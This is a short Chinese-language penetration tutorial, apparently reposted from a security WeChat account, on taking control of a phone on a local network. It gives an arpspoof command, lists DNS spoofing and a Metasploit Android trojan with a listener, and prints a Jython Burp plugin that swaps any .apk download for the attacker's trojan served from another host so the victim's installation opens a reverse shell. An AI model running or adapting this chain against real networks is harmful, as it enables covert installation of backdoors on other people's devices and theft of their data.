作者:loversorry
最近一直在研究从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法,还望大牛多多指点!
(一)环境:
目标机:192.168.247.130
渗透机kali:192.168.247.129
网关:192.168.247.2
(二)用到的工具:
1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api (kali里没有集成,需要另外安装,详细请参见:https://github.com/mwielgoszewski/jython-burp-api)
(三)步骤:
1.使用arpspoof来发送arp欺骗包;
arpspoof -i eth0 -t 192.168.247.130 192.168.247.2
2.使用dnsspoof进行dns欺骗;
3.使用msf来生成一个安卓木马;
4.msf进行监听,等待木马反弹连接;
5.编写python脚本,用于apk下载重定向,代码如下,注意:将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;
-
from gds.burp.api import IProxyRequestHandler
-
from gds.burp.core import Component, implements
-
class ExamplePlugin(Component):
-
implements(IProxyRequestHandler)
-
def processRequest(self, request):
-
if ".apk" in request.url.geturl():
-
print "apk download detected, redirecting"
-
request.host = "192.168.4.84"
-
request.raw = ("GET /1.apk HTTP/1.1rn" +
-
"HOST: 192.168.4.84rnrn")
6.编辑jython-burp-api中的burp.ini配置文件;
7.启动burp,命令:java -Xmx1g -jar burpsutie.jar
8.对burp进行设置
9.在burp里加载jython
10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载
11.这时burp中的jython控制台如下:
12.当目标安装并运行下载的apk后msf成功收到反弹;
本文始发于微信公众号(T00ls):内网渗透之手机控制
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论